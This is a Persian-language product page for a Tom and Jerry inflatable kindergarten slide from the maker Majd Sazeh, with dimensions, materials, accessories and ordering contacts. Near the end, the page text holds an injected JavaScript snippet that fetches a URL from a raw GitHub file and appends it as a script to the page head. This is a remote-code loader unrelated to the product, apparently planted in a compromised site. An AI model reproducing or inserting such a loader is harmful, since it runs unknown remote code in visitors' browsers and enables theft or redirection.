سرسره بادی تام و جری – محصول جدید مجد سازه

سرسره بادی تام و جری – محصول جدید مجد سازه

  • سرسره بادی تام و جری یک سرسره بادی مهد کودکی جدید از تولیدی بادی سازان مجد ( مجد سازه ) می باشد. مشاهده محصول

    ابعاد

    طول این سرسره بادی 4 متر و عرض آن 3 متر می باشد. همچنین ارتفاع این سرسره بادی به 2.5 متر می رسد که در فضاهایی با ارتفاع سقفی کم نیز قابل استفاده باشد. همچنین جهت حمل نقل وزن کلی این سرسره 50 کیلوگرم می باشد.

    جنس پارچه

    جنس پارچه از با کیفیت ترین پارچه کره ای است که به صورت یک لایه ضخیم ساخته شده تا در برابر فشار بالای هوا مقاوم باشد. همچنین کیفیت این پارچه به دور از پوسدگی زودرس است.

    دوخت سرسره بادی تام و جری

    نخ این سرسره ها از با کیفیت ترین نخ های ترکیه ای می باشد. که توسط تیم مجرب بادی سازان مجد ( مجد سازه ) با تجهیزات بالا دوخته می شود.

    طرح و رنگ

    طرح این سرسره در دو طرح تام جری می باشد که در حال حاضر تنها یک طرح آن قابل تولید است و به صورت تک طرح عرضه می شود. همچنین رنگ پارچه و روکش سر با توجه به موجودی انبار و کیفیت مناسب برای هر بخش دوخته می شود. چاپ این سرسره بادی به صورت نانو است که رنگ آن در طول زمان از بین نرود. برای کسب اطلاعات بیشتر می توانید با شماره تلفن 09127484573 تماس حاصل نمایید.

    لوازم جانبی

    این سرسره نیازمند روکش سر است که همراه با سرسره خریداری می شود. همچنین این سرسره نیازمند یک دمنده هوای نیم اسب می باشد که می توانید از طریق همین سایت خریداری نمایید.

    محیط مناسب

    محیط مناسب برای این سرسره بادی بیشتر مهد کودک ها و شهربازی های سرپوشیده می باشد. به علت ارتفاع کم این سرسره بادی شما می توانید در محیط های مختلف با ارتفاع پایین از آن استفاده کنید. اما استفاده از آن در محیط های بزرگ و سرباز بلامانع است.

    محصولات مشابه سرسره بادی تام و جری

    قصر بادی تام و جری یک سرسره مهد کودکی است که ابعادی مطابق با سرسره بادی مهد کودکی باب اسفنجی و مک کوئین دارد. برای خرید و اطلاعات بیشتر به لینک های پایین مراجعه نمایید.

    سرسره بادی تام و جری - سرسره بادی طرح باب اسفنجی
    سرسره بادی تام و جری - سرسره بادی طرح مک کوئین

    نحوه خرید سرسره بادی تام و جری

    برای خرید این محصول می توانید با شماره تلفن 09127484573 تماس حاصل فرمایید. همچنین جهت سفارش و یا اطلاعات بیشتر شما می توانید در شبکه های مجازی همانند تلگرام، واتساپ، ایتا، روبیکا و … با همین شماره تلفن تماس حاصل نمایید.

    نکته مهم: وبلاگ سابق مجد سازه در دسترس نیست شما می توانید از سایت مجد سازه دیدن کنید.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۲ رای

    دیدگاهتان را بنویسید